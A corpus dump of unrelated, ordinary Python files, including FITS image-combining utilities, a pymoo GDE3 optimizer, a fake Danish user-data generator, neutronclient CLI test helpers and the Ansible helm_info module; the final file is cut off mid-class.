            print ("Creating directory", destination)
        shutil.move(f, os.path.join(destination, os.path.basename(f)))
def get_gain_ron(fitsfile):
    """Return the (gain, read-out-noise) pair stored in the primary header,
    after unifying the header keywords with unify_header."""
    primary_header = pf.open(fitsfile, ignore_missing_end=True)[0].header
    unified = unify_header(primary_header)
    return unified["GAIN"], unified["RDNOISE"]
def get_gain_ron_combined_i(gain, ron, n, mode="median"):
    '''
    Returns the effective gain and read-out noise of `n` combined images.
    Available modes: (sum, average, median). For n == 1 the inputs are
    returned untouched; otherwise the results are rounded to 5 decimals
    (and printed) before being returned.
    '''
    if n == 1:
        return gain, ron
    if mode == "sum":
        combined_gain = gain
        combined_ron = np.sqrt(n) * ron
    elif mode == "average":
        combined_gain = 1. * n * gain
        combined_ron = np.sqrt(n) * ron
    elif mode == "median":
        combined_gain = 2. * n * gain / 3.
        combined_ron = np.sqrt(2. * n / 3) * ron
    else:
        # Unknown mode: warn and fall through with the inputs unchanged.
        print ("Unknown selected mode. Avaialable values: (sum, average, median)")
        combined_gain = gain
        combined_ron = ron
    rounded_gain = np.round(combined_gain, 5)
    rounded_ron = np.round(combined_ron, 5)
    print (rounded_gain, rounded_ron)
    return rounded_gain, rounded_ron
def get_gain_ron_combined(fitsfile, n, mode="median"):
    """Convenience wrapper: read gain/RON from `fitsfile` and return their
    combined values for `n` images stacked with `mode`."""
    base_gain, base_ron = get_gain_ron(fitsfile)
    return get_gain_ron_combined_i(base_gain, base_ron, n, mode)
def align_combine(fitsdir, myfilter, examine=True):
    """Align all FITS images matching `myfilter` in `fitsdir` against the first
    one and median-combine them into "out.fits" using IRAF (via pyraf).

    When `examine` is True, the first image is opened interactively with
    imexamine so the user can mark reference coordinates (logged to
    coords.dat) for the alignment step.
    """
    from pyraf import iraf
    # Load the IRAF packages needed by imexamine/imalign/imcombine.
    iraf.noao(_doprint=0)
    iraf.digiphot(_doprint=0)
    iraf.apphot(_doprint=0)
    os.chdir(fitsdir)
    listfiles = glob.glob(myfilter)
    listfiles.sort()
    if (examine):
        print ("Opening ", listfiles[0], " to examine.")
        # Interactive session: the coordinates the user marks are written
        # to coords.dat and reused by imalign below.
        iraf.imexamine(input=listfiles[0], \
                       logfile="coords.dat", \
                       keeplog="yes")
    # IRAF reads file lists from "@file" arguments, so write one out.
    with open("align.list", 'w') as f:
        for i in listfiles:
            f.write(i + "\n")
    print ("Aligning with reference:", listfiles[0])
    iraf.imalign( input = "@align.list", referenc= listfiles[0], coords = "coords.dat", output = "a_@align.list")
    # The aligned copies are prefixed with "a_"; combine those.
    listfiles = glob.glob("a_" + myfilter)
    listfiles.sort()
    with open("comb.list", 'w') as f:
        for i in listfiles:
            f.write(i + "\n")
    print ("Combining" )
    iraf.imcombine(input = "@comb.list",\
                   output = "out.fits",\
                   combine= "median")
| StarcoderdataPython |
6458196 | # -*- coding: utf-8 -*-
import pydash as _
from config import settings
from . import redis_2_elasticsearch, kafka_2_elasticsearch
class Queue2ElasticsearchClient(object):
    """Select the queue→Elasticsearch bridge ('redis' or 'kafka') to use.

    The mode comes from the constructor argument when given, otherwise from
    the `rts.mode` setting (default 'redis').
    """

    def __init__(self, mode=None):
        # Map each supported transport to its bridge implementation.
        self._registry = {
            'redis': redis_2_elasticsearch.q2e,
            'kafka': kafka_2_elasticsearch.q2e,
        }
        # An explicit argument wins over the configured mode.
        self._mode = mode or _.get(settings.SYNC, 'rts.mode', 'redis')
        self._client = _.get(self._registry, self._mode)

    @property
    def client(self):
        """The bridge object for the selected mode (None for unknown modes)."""
        return self._client
client = Queue2ElasticsearchClient().client
| StarcoderdataPython |
9781072 | from decimal import Decimal
import math
import numpy as np
import pandas as pd
import unittest
from hummingbot.strategy.__utils__.trailing_indicators.trading_intensity import TradingIntensityIndicator
class TradingIntensityTest(unittest.TestCase):
    """Tests TradingIntensityIndicator against synthetic random order books.

    The RNG is re-seeded in setUp, so the generated order books — and hence
    the expected indicator values asserted below — are reproducible.
    """
    INITIAL_RANDOM_SEED = 3141592653
    BUFFER_LENGTH = 200

    def setUp(self) -> None:
        np.random.seed(self.INITIAL_RANDOM_SEED)

    @staticmethod
    def make_order_books(original_price_mid, original_spread, original_amount, volatility, spread_stdev, amount_stdev, samples):
        """Generate `samples` synthetic (bid_df, ask_df) order-book snapshots
        around a random-walking mid price with noisy spread and amounts."""
        # 0.1% quantization of prices in the orderbook
        PRICE_STEP_FRACTION = 0.001
        # Generate BBO quotes: mid prices, spreads, and the resulting best
        # bid/ask prices and top-of-book amounts for every tick.
        samples_mid = np.random.normal(original_price_mid, volatility * original_price_mid, samples)
        samples_spread = np.random.normal(original_spread, spread_stdev, samples)
        samples_price_bid = np.subtract(samples_mid, np.divide(samples_spread, 2))
        samples_price_ask = np.add(samples_mid, np.divide(samples_spread, 2))
        samples_amount_bid = np.random.normal(original_amount, amount_stdev, samples)
        samples_amount_ask = np.random.normal(original_amount, amount_stdev, samples)
        # A full orderbook is not necessary, only up to the BBO max deviation
        price_depth_max = max(max(samples_price_bid) - min(samples_price_bid), max(samples_price_ask) - min(samples_price_ask))
        bid_dfs = []
        ask_dfs = []
        # Generate an orderbook for every tick
        for price_bid, amount_bid, price_ask, amount_ask in zip(samples_price_bid, samples_amount_bid, samples_price_ask, samples_amount_ask):
            bid_df, ask_df = TradingIntensityTest.make_order_book(price_bid, amount_bid, price_ask, amount_ask, price_depth_max, original_price_mid * PRICE_STEP_FRACTION, amount_stdev)
            bid_dfs += [bid_df]
            ask_dfs += [ask_df]
        return bid_dfs, ask_dfs

    @staticmethod
    def make_order_book(price_bid, amount_bid, price_ask, amount_ask, price_depth, price_step, amount_stdev, ):
        """Build one (bid_df, ask_df) snapshot: price ladders stepping away
        from the BBO with noisy amounts; row 0 holds the exact BBO amount."""
        prices_bid = np.linspace(price_bid, price_bid - price_depth, math.ceil(price_depth / price_step))
        amounts_bid = np.random.normal(amount_bid, amount_stdev, len(prices_bid))
        amounts_bid[0] = amount_bid
        prices_ask = np.linspace(price_ask, price_ask + price_depth, math.ceil(price_depth / price_step))
        amounts_ask = np.random.normal(amount_ask, amount_stdev, len(prices_ask))
        amounts_ask[0] = amount_ask
        data_bid = {'price': prices_bid, 'amount': amounts_bid}
        bid_df = pd.DataFrame(data=data_bid)
        data_ask = {'price': prices_ask, 'amount': amounts_ask}
        ask_df = pd.DataFrame(data=data_ask)
        return bid_df, ask_df

    def test_calculate_trading_intensity(self):
        """Feed 1000 synthetic snapshots and check the fitted (alpha, kappa)
        pair against values recorded for the fixed seed."""
        N_SAMPLES = 1000
        self.indicator = TradingIntensityIndicator(self.BUFFER_LENGTH)
        original_price_mid = 100
        original_spread = Decimal("10")
        volatility = Decimal("5") / Decimal("100")
        original_amount = Decimal("1")
        spread_stdev = original_spread * Decimal("0.01")
        amount_stdev = original_amount * Decimal("0.01")
        # Generate orderbooks for all ticks
        bids_df, asks_df = TradingIntensityTest.make_order_books(original_price_mid, original_spread, original_amount, volatility, spread_stdev, amount_stdev, N_SAMPLES)
        for bid_df, ask_df in zip(bids_df, asks_df):
            snapshot = (bid_df, ask_df)
            self.indicator.add_sample(snapshot)
        # Expected values are tied to INITIAL_RANDOM_SEED above.
        self.assertAlmostEqual(self.indicator.current_value[0], 1.0006118838992204, 4)
        self.assertAlmostEqual(self.indicator.current_value[1], 0.00016076949224819458, 4)
| StarcoderdataPython |
9688786 | <reponame>jsonchin/nba_dfs_dashboard
from .player import player_profile_endpoint, player_logs_endpoint, player_averages_endpoint
from .game import game_endpoint, game_team_specific_endpoint
from .game_date_games import game_date_games_endpoint
from .file_upload import file_upload_draftkings
from .lineups import lineups_endpoint
| StarcoderdataPython |
61877 | <gh_stars>100-1000
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
"""This file is part of the django ERP project.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
"""
__author__ = '<NAME> <<EMAIL>>'
__copyright__ = 'Copyright (c) 2013-2015, django ERP Team'
__version__ = '0.0.5'
from django.utils.translation import ugettext_noop as _
from djangoerp.menus.utils import get_bookmarks_for
from djangoerp.menus.models import Menu
from .loading import registry
from .forms import TextPluggetForm
def dummy(context):
    """Fallback plugget: delegates rendering to the registry's default function."""
    return registry.default_func(context)
def menu(context):
    """Menu plugget.

    Simply renders a menu.

    It adds a context variable:

     * name -- Slug of the selected menu.

    (Fix: the variable description used to live in a second, detached
    triple-quoted string that was a no-op expression statement, not part of
    the docstring; it is now merged into the real docstring.)
    """
    pk = None
    if "menu_id" in context:
        # NOTE: Here, "context" is not a simple dict instance, so we can't use:
        #
        # >> pk = context.pop("menu_id", None)
        #
        pk = context.get('menu_id')
        del context['menu_id']
    if pk:
        menu = Menu.objects.get(pk=pk)
        context["name"] = menu.slug
    return context
def bookmarks_menu(context):
    """Bookmarks plugget.

    Shows all your bookmarks: looks up the current user's bookmark menu and
    renders it via the `menu` plugget.
    """
    if 'user' in context:
        username = context['user'].username
        context['menu_id'] = get_bookmarks_for(username).pk
    return menu(context)
registry.register_simple_plugget_source(_("Text plugget"), _("Simply renders a text paragraph."), form=TextPluggetForm)
| StarcoderdataPython |
11274481 | from pymoo.algorithms.nsga2 import RankAndCrowdingSurvival
from pymoo.algorithms.so_de import DE
from pymoo.docs import parse_doc_string
from pymoo.model.population import Population
from pymoo.util.display import MultiObjectiveDisplay
from pymoo.util.dominator import get_relation
class GDE3(DE):
    """Generalized Differential Evolution 3: DE with a multi-objective,
    dominance-based parent/offspring survival step."""

    def __init__(self, **kwargs):
        super().__init__(display=MultiObjectiveDisplay(), **kwargs)

    def _next(self):
        # make a step and create the offsprings
        self.off = self.mating.do(self.problem, self.pop, self.n_offsprings, algorithm=self)
        self.off.set("n_gen", self.n_gen)
        # evaluate the offsprings
        self.evaluator.eval(self.problem, self.off, algorithm=self)
        # One-to-one comparison of each parent with its offspring:
        #   rel == 0  -> mutually non-dominated: keep both
        #   rel == -1 -> offspring dominates: keep offspring
        #   otherwise -> parent dominates: keep parent
        survivors = []
        for k in range(self.pop_size):
            parent, off = self.pop[k], self.off[k]
            rel = get_relation(parent, off)
            if rel == 0:
                survivors.extend([parent, off])
            elif rel == -1:
                survivors.append(off)
            else:
                survivors.append(parent)
        survivors = Population.create(*survivors)
        # Keeping both in the non-dominated case can exceed pop_size; trim
        # back with NSGA-II's rank-and-crowding survival.
        if len(survivors) > self.pop_size:
            survivors = RankAndCrowdingSurvival().do(self.problem, survivors, self.pop_size)
        self.pop = survivors
parse_doc_string(GDE3.__init__)
| StarcoderdataPython |
3528388 | #!/usr/bin/python
# -*- coding: utf-8 -*-
from bs4 import BeautifulSoup
import requests
import json
from time import time
import datetime
from loremipsum import *
import random
import math
import os
from .. import firebase_pushid
# Directory of this module, used to resolve data files shipped next to it.
__location__ = os.path.realpath(
    os.path.join(os.getcwd(), os.path.dirname(__file__)))
# Credentials/config for the kortforsyningen.dk geodata service.
kortforsyningen_config = {}
with open(os.path.join(__location__, 'kortforsygningen.json'), 'rb+') as f:
    kortforsyningen_config = json.load(f)
# use these instead of reading from disk all the time.
# (Module-level caches filled lazily by randprovider/randfn/randln.)
email_providers = []
first_names = {
    "female": [],
    "male": []
}
last_names = []
# DEPRECATED class
class User(object):
    """Thin attribute-bag wrapper around a user dict (DEPRECATED).

    The given mapping becomes the instance's __dict__, so its keys are
    readable as attributes.
    """

    def __init__(self, data=None):
        # Fix: the default used to be a mutable `data={}` assigned directly to
        # __dict__, so every default-constructed User shared one dict and
        # attributes set on one instance leaked into all the others.
        self.__dict__ = {} if data is None else data

    def valid(self):
        """Always True; real validation was never implemented."""
        return True
# helpers
# but can also be used as separate 'modules'
def randgender():
    """Pick 'male' or 'female' uniformly at random."""
    options = ('male', 'female')
    return options[random.randint(0, len(options) - 1)]
# scope can be set to: small, medium, large, max
def randfn(scope, gender=None):
    """Return a random Danish first name for `gender` from the name list of
    the given `scope` ("small"/"medium"/"large"/"max"), or None for an
    unknown scope. The name list is cached in the module-level `first_names`
    after the first read."""
    if scope not in ("small", "medium", "large", "max"):
        return None
    global first_names
    if gender is None:
        gender = randgender()
    # Lazily load and cache the list for this gender on first use.
    if not first_names[gender]:
        path = "../../danish-names/src/first-names/{gender}/{scope}.txt".format(gender=gender, scope=scope)
        with open(path) as f:
            names = f.read().split('\n')
        first_names[gender] = names
    else:
        names = first_names[gender]
    return names[random.randint(0, len(names) - 1)]
def randln(scope):
    """Return a random Danish last name from the list of the given `scope`
    ("small"/"medium"/"large"/"max"), or None for an unknown scope. The list
    is cached in the module-level `last_names` after the first read."""
    if scope not in ("small", "medium", "large", "max"):
        return None
    global last_names
    # Lazily load and cache the list on first use.
    if not last_names:
        path = "../../danish-names/src/last-names/{scope}.txt".format(scope=scope)
        with open(path) as f:
            last_names = f.read().split('\n')
    return last_names[random.randint(0, len(last_names) - 1)]
def randprovider():
    """Return a random free e-mail provider domain (cached after first read)."""
    global email_providers
    if not email_providers:
        # Fix: the file was opened with 'rb+', which yields bytes under
        # Python 3 and makes `.split('\n')` raise TypeError; read-only text
        # mode is all that is needed here.
        with open(os.path.join(__location__, 'free_email_provider_domains.txt')) as f:
            email_providers = f.read().split('\n')
    return email_providers[random.randint(0, len(email_providers) - 1)]
# https://english.stackexchange.com/questions/210483/birthdate-vs-birthday-i-know-three-other-people-who-share-my-birthdate
def randts(start, end):
    """Uniform random integer timestamp in [start, end] (inclusive)."""
    return random.randint(start, end)
def randdate(start_ts=-688007541, end_ts=952987659, dateformat='%b %d, %Y'):
    """Random birth-date string for a timestamp in [start_ts, end_ts].

    The defaults span -688007541 (1948, ~70 years old) to 952987659
    (2000, ~18 years old). The timestamp is rendered in local time.

    Fix: the default format used to be '%b %m, %Y', which printed the month
    number twice; '%d' (day of month) was clearly intended for a birthdate.
    """
    ts = randts(start_ts, end_ts)
    return datetime.datetime.fromtimestamp(ts).strftime(dateformat)
# You can specify a gender
# if no gender specified, a random one will be given.
# NSN LENGTH: https://en.wikipedia.org/wiki/Telephone_numbers_in_Denmark
def randphone(country_code, length):
    """Random phone number: `country_code` followed by `length` random digits.

    Fix: the `length` parameter used to be ignored — exactly 8 digits (four
    zero-padded two-digit groups) were always produced. The digit-pair
    generation is kept, with a single extra digit for odd lengths, so the
    original behavior for length == 8 is unchanged.
    """
    digits = []
    for _ in range(length // 2):
        digits.append(str(random.randint(0, 99)).zfill(2))
    if length % 2:
        digits.append(str(random.randint(0, 9)))
    return country_code + "".join(digits)
def randpicture(gender=None):
    """Random randomuser.me portrait URLs (large/medium/thumbnail) for a
    gender; a random gender is chosen when none is given."""
    if gender is None:
        gender = randgender()
    folder = "women" if gender == "female" else "men"
    number = random.randint(0, 99)
    base = "https://randomuser.me/api/portraits"
    return {
        "large": "{0}/{1}/{2}.jpg".format(base, folder, number),
        "medium": "{0}/med/{1}/{2}.jpg".format(base, folder, number),
        "thumbnail": "{0}/thumb/{1}/{2}.jpg".format(base, folder, number)
    }
def closest_addrs(coord, hits):
    """Query kortforsyningen.dk for the `hits` addresses nearest to `coord`
    (a (lat, lng) pair) and return them as a list of dicts with a
    "formattedAddress" string and a structured "address" mapping.
    """
    addrs = []
    url = "https://services.kortforsyningen.dk/"
    # TODO: credentials should come from a proper secrets store rather than
    # the JSON config file loaded at import time.
    params = {
        "login": kortforsyningen_config["login"],
        # Fix: this line had been mangled to `<PASSWORD>_config[...]` (a
        # syntax error) by an anonymization pass; restored the config lookup.
        "password": kortforsyningen_config["password"],
        "servicename": "RestGeokeys_v2",
        "method": "nadresse",
        "geop": "{lng}, {lat}".format(lng=coord[1], lat=coord[0]),
        "hits": str(hits),
        "geometry": "true",
        "georef": "EPSG:4326"
    }
    headers = {
        'Content-Type': 'application/json'
    }
    response = requests.request("GET", url, headers=headers, params=params)
    data = response.json()
    # Build "Klampenborgvej 88, 2800 Kongens Lyngby"-style strings.
    for feature in data["features"]:
        properties = feature["properties"]
        # NOTE(review): the fields below are assumed non-null; the original
        # "check for nullability" comment suggests this was never done.
        # The .encode('utf-8') calls indicate Python-2-era string handling;
        # under Python 3 they would produce bytes — confirm before porting.
        street = properties["vej_navn"].encode('utf-8')
        no = properties["husnr"].encode('utf-8')
        postcode = properties["postdistrikt_kode"].encode('utf-8')
        city = properties["postdistrikt_navn"].encode('utf-8')
        geometry = feature["geometry"]
        coordinate = geometry["coordinates"]  # note: the coordinate points are reversed
        lat = coordinate[1]
        lng = coordinate[0]
        addrs.append({
            "formattedAddress": "{street} {no}, {postcode} {city}".format(street=street, no=no, postcode=postcode, city=city),
            "address": {
                "street": street,
                "no": no,
                "postcode": postcode,
                "city": city,
                "countryName": "Denmark",
                "countryCode": "DK",
                "coordinate": {
                    "lat": lat,
                    "lng": lng
                }
            }
        })
    return addrs
def fetch_muni_details(name):
    """Fetch geometry and details for the municipality called `name` from the
    kortforsyningen.dk REST service and return the parsed JSON response."""
    url = "https://services.kortforsyningen.dk/"
    params = {
        "login": kortforsyningen_config["login"],
        # Fix: this line had been mangled to `<PASSWORD>_config[...]` (a
        # syntax error) by an anonymization pass; restored the config lookup.
        "password": kortforsyningen_config["password"],
        "servicename": "RestGeokeys_v2",
        "method": "kommune",
        # Fix: the `name` argument was ignored and "Kolding" was hard-coded,
        # so randmuni() always fetched the same municipality's details.
        "komnavn": name,
        "geometry": "true",
        "georef": "EPSG:4326"
    }
    headers = {'Content-Type': 'Application/json'}
    response = requests.request("GET", url, headers=headers, params=params)
    return response.json()
def randmuni():
    """Pick a random Danish municipality from the DAWA registry and return
    its full details from kortforsyningen.dk."""
    munis = requests.request("GET", "http://dawa.aws.dk/kommuner/").json()
    chosen = munis[random.randint(0, len(munis) - 1)]
    return fetch_muni_details(chosen["navn"])
# helper method for randpoint
# http://alienryderflex.com/polygon/
def inside(point, bbox):
    """True when the (lat, lng) `point` lies strictly within `bbox`, a
    GeoJSON-style (lng_min, lat_min, lng_max, lat_max) bounding box."""
    lat, lng = point[0], point[1]
    lat_ok = bbox[1] < lat < bbox[3]
    lng_ok = bbox[0] < lng < bbox[2]
    return lat_ok and lng_ok
# Core logic taken from:
# https://gis.stackexchange.com/questions/163044/mapbox-how-to-generate-a-random-coordinate-inside-a-polygon
def randpoint(bbox):
    """Rejection-sample a random (lat, lng) strictly inside `bbox`.

    Core logic taken from:
    https://gis.stackexchange.com/questions/163044/mapbox-how-to-generate-a-random-coordinate-inside-a-polygon
    """
    lat_lo, lat_hi = bbox[1], bbox[3]
    # The lng interval is deliberately taken in the original (reversed)
    # order; sampling direction does not affect the uniform distribution.
    lng_lo, lng_hi = bbox[2], bbox[0]
    while True:
        lat = lat_lo + random.random() * (lat_hi - lat_lo)
        lng = lng_lo + random.random() * (lng_hi - lng_lo)
        candidate = (lat, lng)
        if inside(candidate, bbox):
            return candidate
def randaddr():
    # Stub: random address generation is not implemented; callers get None.
    return None
def fake_user(gender=None):
    """Assemble a fake Danish user dict: random name, e-mail, phone,
    birthdate, portrait URLs, and a real address sampled from a random
    municipality (network calls to DAWA and kortforsyningen.dk)."""
    if gender is None:
        gender = randgender()
    u = {}
    u["id"] = firebase_pushid.PushID().next_id()
    u["isEmployee"] = False
    u["gender"] = gender
    u["firstName"] = randfn("large", u["gender"])
    u["lastName"] = randln("large")
    u["fullName"] = u["firstName"] + " " + u["lastName"]
    # E-mail derived from the name plus a random free provider domain.
    u["email"] = "{fn}.{ln}@{provider}".format(fn=u["firstName"].lower(), ln=u["lastName"].lower(), provider=randprovider())
    u["phone"] = randphone("+45", 8)
    u["birthdate"] = randdate()
    u["picture"] = randpicture(u["gender"])
    # Pick a random municipality, sample a point inside its bounding box,
    # and resolve that point to the nearest real address.
    muni = randmuni()
    bbox = muni["features"][0]["bbox"]
    addr_resp = closest_addrs(randpoint(bbox), 1)
    u["formattedAddress"] = addr_resp[0]["formattedAddress"]
    u["address"] = addr_resp[0]["address"]
    return u
| StarcoderdataPython |
6627798 | <gh_stars>0
# Copyright (C) 2016 <NAME>
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import mock
from neutronclient import shell
from neutronclient.tests.unit import test_cli20
TOKEN = test_cli20.TOKEN
class MyResp(test_cli20.MyResp):
    """Local alias of the fake-HTTP-response helper used by these tests."""
    pass
class MyApp(test_cli20.MyApp):
    """Local alias of the fake CLI application helper used by these tests."""
    pass
class MyComparator(test_cli20.MyComparator):
    """Local alias of the request-body comparator helper used by these tests."""
    pass
class CLIExtTestV20Base(test_cli20.CLITestV20Base):
    """Base test case for neutron CLI extensions: provides helpers that run an
    extension command with mocked client/HTTP layers and verify the resulting
    request (method, URL, body, auth header) and the printed output."""

    def setUp(self, plurals=None):
        super(CLIExtTestV20Base, self).setUp(plurals=plurals)

    def _setup_mock_patch(self, name):
        # Start a patcher without registering cleanup; callers own its lifetime.
        patcher = mock.patch(name)
        thing = patcher.start()
        return thing

    def _mock_load_extensions(self, resource):
        # Make extension discovery return exactly one resource, bypassing
        # the real entry-point scan.
        load_method = ('neutronclient.common.extension.' +
                       '_discover_via_entry_points')
        load_ext_mock = self._setup_mock_patch(load_method)
        load_ext_mock.return_value = [resource]
        return load_ext_mock

    def _test_update_ext_resource(self, resource, cmd, myid, args,
                                  extrafields,
                                  cmd_resource=None, parent_id=None):
        """Run an update command and assert a PUT with the expected body."""
        if not cmd_resource:
            cmd_resource = resource
        body = {resource: extrafields}
        # Resolve the resource path, filling in parent and object ids.
        path = getattr(self.client, cmd_resource + "_path")
        if parent_id:
            path = path % parent_id
        path = path % myid
        mock_body = MyComparator(body, self.client)
        resp = (MyResp(204), None)
        cmd_parser = cmd.get_parser("update_" + cmd_resource)
        with mock.patch.object(cmd, 'get_client',
                               return_value=self.client) as mock_get_client, \
                mock.patch.object(self.client.httpclient, 'request',
                                  return_value=resp) as mock_request:
            shell.run_command(cmd, cmd_parser, args)
            self.assert_mock_multiple_calls_with_same_arguments(
                mock_get_client, mock.call(), None)
            mock_request.assert_called_once_with(
                test_cli20.end_url(path),
                'PUT',
                body=mock_body,
                headers=test_cli20.ContainsKeyValue({'X-Auth-Token': TOKEN}))
        # The command should echo the updated object's id.
        _str = self.fake_stdout.make_string()
        self.assertIn(myid, _str)

    def _test_show_ext_resource(self, resource, cmd, myid, args, fields=(),
                                cmd_resource=None, parent_id=None):
        """Run a show command and assert a GET with the expected fields query."""
        if not cmd_resource:
            cmd_resource = resource
        query = "&".join(["fields=%s" % field for field in fields])
        expected_res = {resource:
                        {self.id_field: myid,
                         'name': 'myname', }, }
        resstr = self.client.serialize(expected_res)
        path = getattr(self.client, cmd_resource + "_path")
        if parent_id:
            path = path % parent_id
        path = path % myid
        cmd_parser = cmd.get_parser("show_" + cmd_resource)
        resp = (MyResp(200), resstr)
        with mock.patch.object(cmd, 'get_client',
                               return_value=self.client) as mock_get_client, \
                mock.patch.object(self.client.httpclient, 'request',
                                  return_value=resp) as mock_request:
            shell.run_command(cmd, cmd_parser, args)
            self.assert_mock_multiple_calls_with_same_arguments(
                mock_get_client, mock.call(), None)
            mock_request.assert_called_once_with(
                test_cli20.end_url(path, query),
                'GET',
                body=None,
                headers=test_cli20.ContainsKeyValue({'X-Auth-Token': TOKEN}))
        # Both the id and the mocked name must appear in the output.
        _str = self.fake_stdout.make_string()
        self.assertIn(myid, _str)
        self.assertIn('myname', _str)

    def _test_delete_ext_resource(self, resource, cmd, myid, args,
                                  cmd_resource=None, parent_id=None):
        """Run a delete command and assert a DELETE on the resource path."""
        if not cmd_resource:
            cmd_resource = resource
        path = getattr(self.client, cmd_resource + "_path")
        if parent_id:
            path = path % parent_id
        path = path % myid
        cmd_parser = cmd.get_parser("delete_" + cmd_resource)
        resp = (MyResp(204), None)
        with mock.patch.object(cmd, 'get_client',
                               return_value=self.client) as mock_get_client, \
                mock.patch.object(self.client.httpclient, 'request',
                                  return_value=resp) as mock_request:
            shell.run_command(cmd, cmd_parser, args)
            self.assert_mock_multiple_calls_with_same_arguments(
                mock_get_client, mock.call(), None)
            mock_request.assert_called_once_with(
                test_cli20.end_url(path),
                'DELETE',
                body=None,
                headers=test_cli20.ContainsKeyValue({'X-Auth-Token': TOKEN}))
        _str = self.fake_stdout.make_string()
        self.assertIn(myid, _str)
| StarcoderdataPython |
8170709 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright: (c) 2020, Ansible Project
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
DOCUMENTATION = r'''
---
module: helm_info
short_description: Get information from Helm package deployed inside the cluster
version_added: "0.11.0"
author:
- <NAME> (@LucasBoisserie)
requirements:
- "helm (https://github.com/helm/helm/releases)"
- "yaml (https://pypi.org/project/PyYAML/)"
description:
- Get information (values, states, ...) from Helm package deployed inside the cluster.
options:
release_name:
description:
- Release name to manage.
required: true
type: str
aliases: [ name ]
release_namespace:
description:
- Kubernetes namespace where the chart should be installed.
required: true
type: str
aliases: [ namespace ]
extends_documentation_fragment:
- kubernetes.core.helm_common_options
'''
EXAMPLES = r'''
- name: Deploy latest version of Grafana chart inside monitoring namespace
kubernetes.core.helm_info:
name: test
release_namespace: monitoring
'''
RETURN = r'''
status:
type: complex
description: A dictionary of status output
returned: only when release exists
contains:
appversion:
type: str
returned: always
description: Version of app deployed
chart:
type: str
returned: always
description: Chart name and chart version
name:
type: str
returned: always
description: Name of the release
namespace:
type: str
returned: always
description: Namespace where the release is deployed
revision:
type: str
returned: always
description: Number of time where the release has been updated
status:
type: str
returned: always
description: Status of release (can be DEPLOYED, FAILED, ...)
updated:
type: str
returned: always
description: The Date of last update
values:
type: str
returned: always
description: Dict of Values used to deploy
'''
import traceback
try:
import yaml
IMP_YAML = True
except ImportError:
IMP_YAML_ERR = traceback.format_exc()
IMP_YAML = False
from ansible.module_utils.basic import AnsibleModule, missing_required_lib, env_fallback
module = None
# Get Values from deployed release
def get_values(command, release_name):
    """Return the user-supplied values of the deployed release as a dict
    (empty when none were set); fails the module on a helm error."""
    get_command = "{0} get values --output=yaml {1}".format(command, release_name)
    rc, out, err = module.run_command(get_command)
    if rc != 0:
        module.fail_json(
            msg="Failure when executing Helm command. Exited {0}.\nstdout: {1}\nstderr: {2}".format(rc, out, err),
            command=get_command
        )
    # Helm 3 prints the literal string "null" when no values are set.
    return {} if out.rstrip("\n") == "null" else yaml.safe_load(out)
# Get Release from all deployed releases
def get_release(state, release_name):
    """Find the release called `release_name` in a parsed `helm list` result
    (`state`); returns the release dict, or None when absent or state is None."""
    releases = state if state is not None else []
    return next((r for r in releases if r['name'] == release_name), None)
# Get Release state from deployed release
def get_release_status(command, release_name):
    """Return the status dict of a deployed release (with its values merged in
    under 'values'), or None when the release is not installed."""
    list_command = "{0} list --output=yaml --filter {1}".format(command, release_name)
    rc, out, err = module.run_command(list_command)
    if rc != 0:
        module.fail_json(
            msg="Failure when executing Helm command. Exited {0}.\nstdout: {1}\nstderr: {2}".format(rc, out, err),
            command=list_command
        )
    release = get_release(yaml.safe_load(out), release_name)
    if release is None:
        # Release not installed in this namespace.
        return None
    release['values'] = get_values(command, release_name)
    return release
def main():
    """Entry point: parse module arguments, build the base helm command line,
    and return the release status (if any) as module facts."""
    global module
    module = AnsibleModule(
        argument_spec=dict(
            binary_path=dict(type='path'),
            release_name=dict(type='str', required=True, aliases=['name']),
            release_namespace=dict(type='str', required=True, aliases=['namespace']),
            # Helm options
            kube_context=dict(type='str', aliases=['context'], fallback=(env_fallback, ['K8S_AUTH_CONTEXT'])),
            kubeconfig_path=dict(type='path', aliases=['kubeconfig'], fallback=(env_fallback, ['K8S_AUTH_KUBECONFIG'])),
        ),
        supports_check_mode=True,
    )
    # PyYAML is an optional import at module load; fail clearly if absent.
    if not IMP_YAML:
        module.fail_json(msg=missing_required_lib("yaml"), exception=IMP_YAML_ERR)
    bin_path = module.params.get('binary_path')
    release_name = module.params.get('release_name')
    release_namespace = module.params.get('release_namespace')
    # Helm options
    kube_context = module.params.get('kube_context')
    kubeconfig_path = module.params.get('kubeconfig_path')
    # Prefer an explicit helm binary; otherwise look it up on PATH.
    if bin_path is not None:
        helm_cmd_common = bin_path
    else:
        helm_cmd_common = module.get_bin_path('helm', required=True)
    # Append the common flags shared by every helm invocation below.
    if kube_context is not None:
        helm_cmd_common += " --kube-context " + kube_context
    if kubeconfig_path is not None:
        helm_cmd_common += " --kubeconfig " + kubeconfig_path
    helm_cmd_common += " --namespace=" + release_namespace
    release_status = get_release_status(helm_cmd_common, release_name)
    # This module only reads state, so `changed` is always False.
    if release_status is not None:
        module.exit_json(changed=False, status=release_status)
    module.exit_json(changed=False)
# Standard Ansible module entry point.
if __name__ == '__main__':
    main()
| StarcoderdataPython |
8077561 | <reponame>meghanaravikumar/sigopt-examples
from distilbert_data_model_loaders.load_transfomer_model import LoadModel
import logging
class LoadPretrainedModel(LoadModel):
